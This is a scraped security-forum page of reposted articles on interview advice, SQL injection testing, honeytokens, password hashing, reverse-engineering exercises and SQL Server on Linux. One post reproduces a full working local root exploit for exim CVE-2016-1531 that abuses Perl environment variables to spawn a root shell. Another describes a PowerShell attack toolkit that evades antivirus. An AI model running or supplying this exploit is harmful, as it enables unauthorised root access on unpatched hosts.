are decrypted directly into memory, so the plain text payloads never touch the hard drive. This helps avoid detection by most antivirus solutions. PS>Attack is also written using native .NET functions and objects to process PowerShell code, it does not rely on “powershell.exe”. Because .NET is such an important part of Windows, this means that it’s very difficult for an organization to prevent PS>Attack from accessing the functionality it needs to run. GETTING PS>ATTACK PS>Attack is available on our Github account. You can either compile the code yourself using Visual Studio or you can download pre-compiled binaries from the “releases” tab. ACKNOWLEDGMENTS PS>Attack relies on a lot of tools to make itself effective and it’s important to make sure that the authors of those tools get the attention they deserve. Scripts from the following tools and frameworks are incorporated into PS>Attack. These tools represent some of the best work being done in offensive PowerShell today: PowerSploit Nishang Inveigh PowerCat Jared Haight Sursa: http://blog.gdssecurity.com/labs/2016/3/8/introducing-psattack.html
  14. Nytro
    How to pass a programming interview by Ammon Bartram This post started as the preparation material we send to our candidates, but we decided to post it publicly. Being a good programmer has a surprisingly small role in passing programming interviews. To be a productive programmer, you need to be able to solve large, sprawling problems over weeks and months. Each question in an interview, in contrast, lasts less than one hour. To do well in an interview, then, you need to be able to solve small problems quickly, under duress, while explaining your thoughts clearly. This is a different skill [1]. On top of this, interviewers are often poorly trained and inattentive (they would rather be programming), and ask questions far removed from actual work. They bring bias, pattern matching, and a lack of standardization. Running Triplebyte, I see this clearly. We interview engineers without looking at resumes, and fast-track them to on-sites at YC companies. We’ve interviewed over 1000 programmers in the last nine months. We focus heavily on practical programming, and let candidates pick one of several ways to be evaluated. This means we work with many (very talented) programmers without formal CS training. Many of these people do poorly on interviews. They eat large sprawling problems for breakfast, but they balk at 45-min algorithm challenges. The good news is that interviewing is a skill that can be learned. We’ve had success teaching candidates to do better on interviews. Indeed, the quality that most correlates with a Triplebyte candidate passing interviews at YC companies is not raw talent, but rather diligence. I fundamentally do not believe that good programmers should have to learn special interviewing skills to do well on interviews. But the status quo is what it is. We’re working at Triplebyte to change this. If you’re interested in what we’re doing, we’d love you to check out our process. In the meantime, if you do want to get better at interviewing, this blog post describes how we think you can most effectively do so. 1. Be enthusiastic Enthusiasm has a huge impact on interview results. About 50% of the Triplebyte candidates who fail interviews at companies fail for non-technical reasons. This is usually described by the company as a “poor culture fit”. Nine times out of ten, however, culture fit just means enthusiasm for what a company does. Companies want candidates who are excited about their mission. This carries as much weight at many companies as technical skill. This makes sense. Excited employees will be happier and work harder. The problem is that this can be faked. Some candidates manage to convince every company they talk to that it’s their dream job, while others (who are genuinely excited) fail to convince anyone. We’ve seen this again and again. The solution is for everyone to get better at showing their enthusiasm. This is not permission to lie. But interviewing is like dating. No one wants to be told on a first date that they are one option among many, even though this is usually the case. Similarly, most programmers just want a good job with a good paycheck. But stating this in an interview is a mistake. The best approach is to prepare notes before an interview about what you find exciting about the company, and bring this up with each interviewer when they ask if you have any questions. A good source of ideas is to read the company’s recent blog posts and press releases and note the ones you find exciting. This idea seems facile. I imagine you are nodding along as you read this. But (as anyone who has ever interviewed can tell you) a surprisingly small percentage of applicants do this. Carefully preparing notes on why you find a company exciting really will increase your pass rate. You can even reference the notes during the interview. Bringing prepared notes shows preparation. 2. Study common interview concepts A large percentage of interview questions feature data structures and algorithms. For better or worse, this is the truth. We gather question details from our candidates who interview at YC companies (we’ll be doing a in-depth analysis of this data in a future article), and algorithm questions make up over 70% of the questions that are asked. You do not need to be an expert, but knowing the following list of algorithms and data structures will help at most companies. Hash tables Linked lists Breadth-first search, depth-first search Quicksort, merge sort Binary search 2D arrays Dynamic arrays Binary search trees Dynamic programming Big-O analysis Depending on your background, this list may look trivial, or may look totally intimidating. That’s exactly the point. These are concepts that are far more common in interviews than they are in production web programming. If you’re self-taught or years out of school and these concepts are not familiar to you, you will do better in interviews if you study them. Even if you do know these things, refreshing your knowledge will help. A startlingly high percentage of interview questions reduce to breadth-first search or the use of a hash table to count uniques. You need to be able to write a BFS cold, and you need to understand how a hash table is implemented. Learning these things is not as hard as many of the people we talk to fear. Algorithms are usually described in academic language, and this can be off-putting. But at its core, nothing on this list is more complicated than the architecture of a modern web app. If you can build a web app (well), you can learn these things. The resource that I recommend is the book The Algorithm Design Manual by Steven Skiena. Chapters 3 through 5 do a great job of going over this material, in a straightforward way. It does use C and some math syntax, but it explains the material well. Coursera also has several good algorithms courses. This one, in particular, focuses on the concepts that are important in interviews. Studying algorithms and data structures helps not only because the material comes up in interviews, but also because the approach to problems taken in an algorithm course is the same approach that works best in interviews. Studying algorithms will get you in an interview mindset. 3. Get help from your interviewer Interviewers help candidates. They give hints, they respond to ideas, and they generally guide the process. But they don’t help all candidates equally. Some programmers are able to extract significant help, without the interviewer holding it against them. Others are judged harshly for any hints they are given. You want to be helped. This comes down to process and communication. If the interviewer likes your process and you communicate well with them, they will not mind helping. You can make this more likely by following a careful process. The steps I recommend are: Ask questions Talk through a brute-force solution Talk through an optimized solution Write code After you are asked an interview question, start by clarifying what was asked. This is the time to be pedantic. Clarify every ambiguity you can think of. Ask about edge cases. Bring up specific examples of input, and make sure you are correct about the expected output. Ask questions even if you’re almost sure you know the answers. This is useful because it gives you a chance to come up with edge cases and fully spec the problem (seeing how you handle edge-cases is one of the main things that interviewers look for when evaluating an interview), and also because it gives you a minute to collect your thoughts before you need to start solving the problem. Next, you should talk through the simplest brute-force solution to the problem that you can think of. You should talk, rather than jump right into coding, because you can move faster when talking, and it’s more engaging for the interviewer. If the interviewer is engaged, they will step in and offer pointers. If you retreat into writing code, however, you'll miss this opportunity. Candidates often skip the brute-force step, assuming that the brute-force solution to the problem is too obvious, or wrong. This is a mistake. Make sure that you always give a solution to the problem you’ve been asked (even if it takes exponential time, or an NSA super computer). When you’ve described a brute-force solution, ask the interviewer if they would like you to implement it, or come up with more efficient solution. Normally they will tell you to come up with a more efficient solution. The process for the more efficient solution is the same as for the brute force. Again talk, don’t write code, and bounce ideas off of the interviewer. Hopefully, the question will be similar to something you’ve seen, and you’ll know the answer. If that is not the case, it’s useful to think of what problems you’ve seen that are most similar, and bring these up with the interviewer. Most interview questions are slightly-obscured applications of classic CS algorithms. The interviewer will often guide you to this algorithm, but only if you begin the process. Finally, after both you and your interviewer agree that you have a good solution, you should write your code. Depending on the company, this may be on a computer or a whiteboard. But because you’ve already come up with the solution, this should be fairly straightforward. For extra points, ask your interviewer if they would like you to write tests. 4. Talk about trade-offs Programming interviews are primarily made up of programming questions, and that is what I have talked about so far. However, you may also encounter system design questions. Companies seem to like these especially for more experienced candidates. In a system design question, the candidate is asked how he or she would design a complex real-world system. Examples include designing Google maps, designing a social network, or designing an API for a bank. The first observation is that answering system design questions requires some specific knowledge. Obviously no one actually expects you to design Google maps (that took a lot of people a long time). But they do expect you to have some insight into aspects of such a design. The good news is that these questions usually focus on web backends, so you can make a lot of progress by reading about this area. An incomplete list of things to understand is: HTTP (at the protocol level) Databases (indexes, query planning) CDNs Caching (LRU cache, memcached, redis) Load balancers Distributed worker systems You need to understand these concepts. But more importantly, you need to understand how they fit together to form real systems. The best way to learn this is to read about how other engineers have used the concepts. The blog High Scalability is a great resource for this. It publishes detailed write-ups of the back-end architecture at real companies. You can read about how every concept on the list above is used in real systems. Once you’ve done this reading, answering system design questions is a matter of process. Start at the highest level, and move downward. At each level, ask your interviewer for specifications (should you suggest a simple starting point, or talk about what a mature system might look like?) and talk about several options (applying the ideas from your reading). Discussing tradeoffs in your design is key. Your interviewer cares less about whether your design is good in itself, and more about whether you are able to talk about the trade-offs (positives and negatives) of your decisions. Practice this. 5. Highlight results The third type of question you may encounter is the experience question. This is where the interviewer asks you to talk about a programming project that you completed in the past. The mistake that many engineers make on this question is to talk about a technically interesting side-project. Many programmers choose to talk about implementing a neural network classifier, or writing a Twitter grammar bot. These are bad choices because it’s very hard for the interviewer to judge their scope. Many candidates exaggerate simple side projects (sometimes that never actually worked), and the interviewer has no way to tell if you are doing this. The solution is to choose a project that produced results, and highlight the results. This often involves picking a less technically interesting project, but it’s worth it. Think (ahead of time) of the programming you’ve done that had the largest real-world impact. If you’ve written a iOS game, and 50k people have downloaded it, the download number makes it a good option. If you’ve written an admin interface during an internship that was deployed to the entire admin staff, the deployment makes it a good thing to talk about. Selecting a practical project will also communicate to the company that you focus on actual work. Programmer too focused on interesting tech is an anti-pattern that companies screen against (these programmers are sometimes not productive). 6. Use a dynamic language, but mention C I recommend that you use a dynamic language like Python, Ruby or JavaScript during interviews. Of course, you should use whatever language you know best. But we find that many people try interviewing in C , C++ or Java, under the impression these are the “real’ programming languages. Several classic books on interviewing recommend that programmers choose Java or C++. At startups at least, we’ve found that this is bad advice. Candidates do better when using dynamic languages. This is true, I think, because of dynamic languages’ compact syntax, flexible typing, and list and hash literals. They are permissive languages. This can be a liability when writing complex systems (a highly debatable point), but it’s great when trying to cram binary search onto a whiteboard. No matter what language you use, it’s helpful to mention work in other languages. An anti-pattern that companies screen against is people who only know one language. If you do only know one language, you have to rely on your strength in that language. But if you’ve done work or side-projects in multiple languages, be sure to bring this up when talking to your interviewers. If you have worked in lower-level languages like C, C++, Go, or Rust, talking about this will particularly help. Java, C# and PHP are a problematic case. As we described in our last blog post, we’ve uncovered bias against these languages in startups. We have data showing that programmers using these languages in the interview pass at a lower rate. This is not fair, but it is the truth. If you have other options, I recommend against using these languages in interviews with startups. 7. Practice, practice, practice You can get much better at interviewing by practicing answering questions. This is true because interviews are stressful, but stress harms performance. The solution is practice. Interviewing becomes less stressful with exposure. This happens naturally with experience. Even within a single job search, we find that candidates often fail their initial interviews, and then pass more as their confidence builds. If stress is something you struggle with, I recommend that you jumpstart this process by practicing interview stress. Get a list of interview questions (the book Cracking the Coding Interview is one good source) and solve them. Set a 20-minute timer on each question, and race to answer. Practice writing the answers on a whiteboard (not all companies require this, but it’s the worst case, so you should practice it). A pen on paper is a pretty good simulation of a whiteboard. If you have friends who can help you prepare, taking turns interviewing each other is great. Reading a lot of interview questions has the added benefit of providing you ideas to use when in actual interviews. A surprising number of questions are re-used (in full or in part). Even experienced (and stress-free) candidates will benefit from this. Interviewing is a fundamentally different skill from working as a programmer, and it can atrophy. But experienced programers often (reasonably) feel that they should not have to prepare for interviews. They study less. This is why junior candidates often actually do better on interview questions than experienced candidates. Companies know this, and, paradoxically, some tell us they set lower bars on the programming questions for experienced candidates. 8. Mention credentials Credentials bias interviewers. Triplebyte candidates who have worked at a top company or studied at a top school go on to pass interviews at a 30% higher rate than programmers who don’t have these credentials (for a given level of performance on our credential-blind screen). I don’t like this. It’s not meritocratic and it sucks, but if you have these credentials, it’s in your interest to make sure that your interviewers know this. You can’t trust that they’ll read your resume. 9. Line up offers If you’ve ever read fund-raising advice for founders, you’ll know that getting the 1st VC to make an investment offer is the hardest part. Once you have one offer, more come pouring in. The same is true of job offers. If you already have an offer, be sure to mention this in interviews. Mentioning other offers in an interview heavily biases the interviewer in your favor. This brings up the strategy of making a list of the companies you’re interested in, and setting up interviews inreverse order of interest. Doing well earlier in the process will increase your probability of getting an offer from you number one choice. You should do this. Conclusion Passing interviews is a skill. Being a great programmer helps, but it’s only part of the picture. Everyone fails some of their interviews, and preparing properly can help everyone pass more. Enthusiasm is paramount, and research helps with this. As many programmers fail for lacking enthusiasm as fail for technical reasons. Interviewers help candidates during interviews, and if you follow a good process and communicate clearly, they will help you. Practice always helps. Reading lots of interview questions and inuring yourself to interview stress will lead to more offers. This situation is not ideal. Preparing for interviews is work, and forcing programmers to learn skills other than building great software wastes everyone’s time. Companies should improve their interview processes to be less biased by academic CS, memorized facts, and rehearsed interview processes. This is what we’re doing at Triplebyte. We help programmers get jobs without looking at resumes. We let programmers pick one of several areas in which to be evaluated, and we study and improve our process over time. We’d love to help you get a job at a startup, without jumping through these hoops. You can get started here. But the status quo is what it is. Until this changes, programmers should know how to prepare. Thanks to Jared Friedman, Emmett Shear, Garry Tan, Alexis Ohanian and Daniel Gackle for reading drafts of this. Sursa: http://blog.triplebyte.com/how-to-pass-a-programming-interview
  15. Nytro
    Black Hat Europe 2015 https://www.youtube.com/playlist?list=PLH15HpR5qRsVd9jdTWUB5s16fmr2VCQyS
  16. Nytro
    Data Extraction via String Concatenation in a Blind SQL Injection Vulnerability March 7, 2016 Posted By Carlos Muñoz Day One: In Which The Heavens Part, But Only Slightly A few weeks ago while performing a web application test for $CLIENT, I happened to run into search functionality. As one of the very first standard tests I inserted a single quote ' into the search field and clicked the search button. The SQL error message that was returned was the stuff dreams are made of (ie: a lot of info, slightly vague, not everything there, but enough in that moment to make you really, really believe). After a few quick tests to see if anything easy could be obtained (nope, no such luck), and confirming that I wouldn't be negatively impacting $CLIENT's systems if I did so, I turned it over to automated tools and went about testing other parts of the application. Time passed, and a few other issues were discovered and documented (it doesn't exist if no one else can reproduce it from your official description), and I went back to view the progress of automated tools, eager to see the keys to the kingdom laid down before me. Nothing. Okay, maybe I made a mistake or two setting the automated tools up? Investigations disproved that line of thinking, as the recorded request/response pairs showed the attacks were being properly sent with all the appropriate data. It is probably my imagination, but I think I can hear $CLIENT's webapp laughing at me. Hmmmm . . . this may be a bit more complex than I had hoped. Articol complet: https://www.trustwave.com/Resources/SpiderLabs-Blog/Data-Extraction-via-String-Concatenation-in-a-Blind-SQL-Injection-Vulnerability/
      • 1
      • Upvote
  17. Nytro
    #!/bin/sh # CVE-2016-1531 exim <= 4.84-3 local root exploit # =============================================== # you can write files as root or force a perl module to # load by manipulating the perl environment and running # exim with the "perl_startup" arguement -ps. # # e.g. # [fantastic@localhost tmp]$ ./cve-2016-1531.sh # [ CVE-2016-1531 local root exploit # sh-4.3# id # uid=0(root) gid=1000(fantastic) groups=1000(fantastic) # # -- Hacker Fantastic echo [ CVE-2016-1531 local root exploit cat > /tmp/root.pm << EOF package root; use strict; use warnings; system("/bin/sh"); EOF PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps Sursa: https://github.com/HackerFantastic/Public/blob/master/exploits/cve-2016-1531.sh
  18. Nytro
    Exercises for learning Reverse Engineering and Exploitation All binaries for these challenges are ELF 64-bit LSB executable, x86-64. reverse engineering The goal is to run the chalenges like this ./rX password and having them print out password OK. It's reverse engineering, not cracking. So don't patch the binnaries if you want to play by the rules. It gets really borring if you don't anyway. sploit All the sploit exercices are designed to be solvable with NX+ASLR without being dependant on which libc is used. The idea is you should only interact with stdin / stdout as if it was a remote service, argv & env is not needed for exploitation. The goal is of course to spawn a shell on each one. All of them are tested. Of course you can still do whatever you like, have fun! Sursa: https://github.com/wapiflapi/exrs
  19. Nytro
    DCEPT DCEPT (Domain Controller Enticing Password Tripwire) is a honeytoken-based tripwire for Microsoft's Active Directory. Honeytokens are pieces of information intentionally littered on system so they can be discovered by an intruder. In the case of DCEPT, the honeytokens are credentials that would only be known by a someone extracting them from memory. A logon attempt using these faux credentials would mean someone was inside the network and is attempting privilege escalation to domain administrator. This proof of concept is being released as open source to benefit Windows system administrators. The goal of this project was to provide a free, simple, honeytoken deployment tool as well as educate administrators about the nature of these attacks. We encourage contributors to build on what we have done and welcome feedback. Has DCEPT helped your organization spot an intrusion before it was too late? We would like to hear from you. More information about this research project can be found here: https://www.secureworks.com/blog/dcept Download: https://github.com/secureworks/dcept
  20. Nytro
    The Art of Assembly Language The Art of Assembly Language ................................................................. 1 Volume One: .............................................................................................. 1 Data Representation ................................................................................... 1 Chapter One Foreward ................................................................................ 3 Chapter Two Hello, World of Assembly Language ................................... 11 Chapter Three Data Representation ............................................................ 43 Chapter Four More Data Representation .................................................... 77 Chapter Five ............................................................................................... 109 Chapter Five Questions, Projects, and Lab Exercises ................................. 109 Volume Two: ............................................................................................. 129 Machine Architecture ................................................................................. 129 Chapter One System Organization .............................................................. 131 Chapter Two Memory Access and Organization ........................................ 151 Chapter Three Introduction to Digital Design ............................................ 195 Chapter Four CPU Architecture .................................................................. 225 Chapter Five Instruction Set Architecture .................................................. 261 Chapter Six Memory Architecture .............................................................. 293 Chapter Seven The I/O Subsystem ............................................................. 315 Chapter Eight Questions, Projects, and Labs .............................................. 341 Volume Three: ........................................................................................... 375 Basic Assembly Language ......................................................................... 375 Chapter One Constants, Variables, and Data Types .................................. 377 Chapter Two Introduction to Character Strings .......................................... 401 Chapter Three Characters and Character Sets ............................................ 421 Chapter Four Arrays ................................................................................... 445 Chapter Five Records, Unions, and Name Spaces ...................................... 465 Chapter Six Dates and Times ...................................................................... 481 Chapter Seven Files .................................................................................... 497 Chapter Eight Introduction to Procedures ................................................... 521 Chapter Nine Managing Large Programs ................................................... 549 Chapter Ten Integer Arithmetic .................................................................. 567 Chapter Eleven Real Arithmetic ................................................................. 591 Chapter Twelve Calculation Via Table Lookups ........................................ 625 Chapter Thirteen Questions, Projects, and Labs ......................................... 641 Volume Four: ............................................................................................. 703 Intermediate Assembly Language .............................................................. 703 Chapter One Advanced High Level Control Structures ............................. 705 Chapter Two Low-Level Control Structures .............................................. 729 Chapter Three Intermediate Procedures ...................................................... 781 Chapter Four Advanced Arithmetic ............................................................ 827 Chapter Five Bit Manipulation ................................................................... 881 Chapter Six The String Instructions ........................................................... 907 Chapter Seven The HLA Compile-Time Language ................................... 921 Chapter Eight Macros ................................................................................. 941 Chapter Nine Domain Specific Embedded Languages ............................... 975 Chapter Ten Classes and Objects ................................................................ 1029 Chapter Eleven The MMX Instruction Set ................................................. 1083 Chapter Twelve Mixed Language Programming ........................................ 1119 Chapter Thirteen Questions, Projects, and Labs ......................................... 1163 Section Five ............................................................................................... 1245 Section Five Advanced Assembly Language Programming ...................... 1245 Chapter One Thunks ................................................................................... 1247 Chapter Two Iterators ................................................................................. 1271 Chapter Three Coroutines and Generators .................................................. 1293 Chapter Four Low-level Parameter Implementation .................................. 1305 Chapter Five Lexical Nesting ..................................................................... 1337 Chapter Six Questions, Projects, and Labs ................................................. 1359 Appendix A Answers to Selected Exercises ............................................... 1365 Appendix B Console Graphic Characters ................................................... 1367 Appendix D The 80x86 Instruction Set ...................................................... 1409 Appendix E The HLA Language Reference ............................................... 1437 Appendix F The HLA Standard Library Reference .................................... 1439 Appendix G HLA Exceptions ..................................................................... 1441 Appendix H HLA Compile-Time Functions .............................................. 1447 Appendix I Installing HLA on Your System .............................................. 1477 Appendix J Debugging HLA Programs ...................................................... 1501 Appendix K Comparing HLA and MASM ................................................. 1505 Appendix L HLA Code Generation for HLL Statements ........................... 1507 Download: http://portal.aauj.edu/portal_resources/downloads/programming/assembly_language32bit_edition.pdf
      • 2
      • Upvote
  21. Nytro
    Password Hashing: Why and How posted March 7, 2016 by "No Bugs" Hare, translated by Sergey Ignatchenko,originally published in Overload #129 in October 2015 Author: “No Bugs” Hare [[About Vol.2 of the upcoming “Development and Deployment of MMOG” book. There is no need to worry, I just need some time to prepare for publishing of Vol.1. “beta” chapters of Vol.2 are planned to start appearing in 3 weeks from now. Stay tuned!]] Password hashing is a non-trivial topic, which has recently become quite popular. While it is certainly not the only thing which you need to do make your network app secure, it is one of those security measures every security-conscious developer should implement. In this article, we’ll discuss what it is all about, why hash functions need to be slow, and how password hashing needs to be implemented in your applications. What is it all about? “For password hashing, the answer is very unpleasant: we’re trying to mitigate the consequences arising from stealing the whole of your site’s password database.Whenever we’re speaking about security, there is always the question: what exactly is the threat we’re trying to protect ourselves from? For password hashing, the answer is very unpleasant: we’re trying to mitigate the consequences arising from stealing the whole of your site’s password database. This is usually accompanied by the potential for stealing pretty much any other data in your database, and represents the Ultimate Nightmare of any real-world security person. Some (including myself) will argue that such mitigation is akin to locking the stable door after the horse has bolted, and that security efforts should be directed towards preventing the database-stealing from happening in the first place. While I certainly agree with this line of argument, on the other hand implementing password hashing is so simple and takes so little time (that is, if you designed for it from the very beginning) that it is simply imprudent not to implement it. Not to mention that if you’re not doing password hashing, everybody (your boss and any code reviewers/auditors included) will say, “Oh, you don’t do password hashing, which is The Second Most Important Security Feature In The Universe (after encryption, of course).” The most important thing, however, is not to forget about a dozen other security-related features which also need to be implemented (such as TLS encryption, not allowing passwords which are listed in well-known password dictionaries, limits on login rate, etc. etc. – see ‘Bottom Line’ section below for some of these) Articol complet: http://ithare.com/password-hashing-why-and-how/
      • 1
      • Upvote
  22. Nytro
    Cautam Junior Pentester(s). Daca cineva e interesat, astept un PM. Requirements: - Passion.
  23. Nytro
    Senzorul de amprentă de pe telefoane poate fi păcălit cu o foaie de hârtie Blocarea smartphone-ului personal cu ajutorul unui senzor biometric este una dintre cele mai sigure metode de securitate pentru astfel de dispozitive. Mulţi au încercat să spargă această protecţie folosind diverse metode costisitoare, însă până în prezent imprimarea amprentei pe o foaie de hârtie nu a avut prea mult succes. Se pare însă că ideea era bună, însă echipamentul nu era destul de performant pentru a realiza o amprentă falsă. Soluţia? O imprimantă care lasă pe hârtie cerneală conductivă. Articol complet si video: http://www.go4it.ro/telefoane-mobile/senzorul-de-amprenta-de-pe-telefoane-poate-fi-pacalit-cu-o-foaie-de-hartie-15100336/
  24. Nytro
    Announcing SQL Server on Linux Posted March 7, 2016 By Scott Guthrie - Executive Vice President, Cloud and Enterprise Group, Microsoft It’s been an incredible year for the data business at Microsoft and an incredible year for data across the industry. This Thursday at our Data Driven event in New York, we will kick off a wave of launch activities for SQL Server 2016 with general availability later this year. This is the most significant release of SQL Server that we have ever done, and brings with it some fantastic new capabilities. SQL Server 2016 delivers: Groundbreaking security encryption capabilities that enable data to always be encrypted at rest, in motion and in-memory to deliver maximum security protection In-memory database support for every workload with performance increases up to 30-100x Incredible Data Warehousing performance with the #1, #2 and #3 TPC-H 10 Terabyte benchmarks for non-clustered performance, and the #1 SAP SD Two-Tier performance benchmark on windows Business Intelligence for every employee on every device – including new mobile BI support for iOS, Android and Windows Phone devices Advanced analytics using our new R support that enables customers to do real-time predictive analytics on both operational and analytic data Unique cloud capabilities that enable customers to deploy hybrid architectures that partition data workloads across on-premises and cloud based systems to save costs and increase agility These improvements, and many more, are all built into SQL Server and bring you not just a new database but a complete platform for data management, business analytics and intelligent apps – one that can be used in a consistent way across both on-premises and the cloud. In fact, over the last year we’ve been using the SQL Server 2016 code-base to run in production more than 1.4 million SQL Databases in the cloud using our Azure SQL Database as a Service offering, and this real-world experience has made SQL Server 2016 an incredibly robust and battle-hardened data platform. Gartner recently named Microsoft as leading the industry in their Magic Quadrant for Operational Database Management Systems in both execution and vision. We’re also a leader in Gartner’s Magic Quadrant for Data Warehouse and Data Management Solutions for Analytics, and Magic Quadrant for Business Intelligence and Analytics Platforms, as well as leading in vision in the Magic Quadrant for Advanced Analytics Platforms. Extending SQL Server to Also Now Run on Linux Today I’m excited to announce our plans to bring SQL Server to Linux as well. This will enable SQL Server to deliver a consistent data platform across Windows Server and Linux, as well as on-premises and cloud. We are bringing the core relational database capabilities to preview today, and are targeting availability in mid-2017. SQL Server on Linux will provide customers with even more flexibility in their data solution. One with mission-critical performance, industry-leading TCO, best-in-class security, and hybrid cloud innovations – like Stretch Database which lets customers access their data on-premises and in the cloud whenever they want at low cost – all built in. “This is an enormously important decision for Microsoft, allowing it to offer its well-known and trusted database to an expanded set of customers”, said Al Gillen, group vice president, enterprise infrastructure, at IDC. “By taking this key product to Linux Microsoft is proving its commitment to being a cross platform solution provider. This gives customers choice and reduces the concerns for lock-in. We would expect this will also accelerate the overall adoption of SQL Server.” “SQL Server’s proven enterprise experience and capabilities offer a valuable asset to enterprise Linux customers around the world,” said Paul Cormier, President, Products and Technologies, Red Hat. “We believe our customers will welcome this news and are happy to see Microsoft further increasing its investment in Linux. As we build upon our deep hybrid cloud partnership, spanning not only Linux, but also middleware, and PaaS, we’re excited to now extend that collaboration to SQL Server on Red Hat Enterprise Linux, bringing enterprise customers increased database choice.” “We are delighted to be working with Microsoft as it brings SQL Server to Linux,” said Mark Shuttleworth, founder of Canonical. “Customers are already taking advantage of Azure Data Lake services on Ubuntu, and now developers will be able to build modern applications that utilize SQL Server’s enterprise capabilities.” Bringing SQL Server to Linux is another way we are making our products and new innovations more accessible to a broader set of users and meeting them where they are. Just last week, we announced our agreement to acquire Xamarin. Recently, we alsoannounced Microsoft R Server , our technologies based on our acquisition of Revolution Analytics, with support for Hadoop and Teradata. The private preview of SQL Server on Linux is available starting today and we look forward to working with the community, our customers and our partners to bring it to market. Please join me Satya Nadella, Joseph Sirosh and Judson Althoff at our Data Driven event on Thursday to hear more about this news and how Microsoft is helping customers transform their business using data. Thanks, Scott Sursa: https://blogs.microsoft.com/blog/2016/03/07/announcing-sql-server-on-linux/
  25. Nytro
    Exploiting Adobe Flash Player In The Era Of Control Flow Guard
×
×
  • Create New...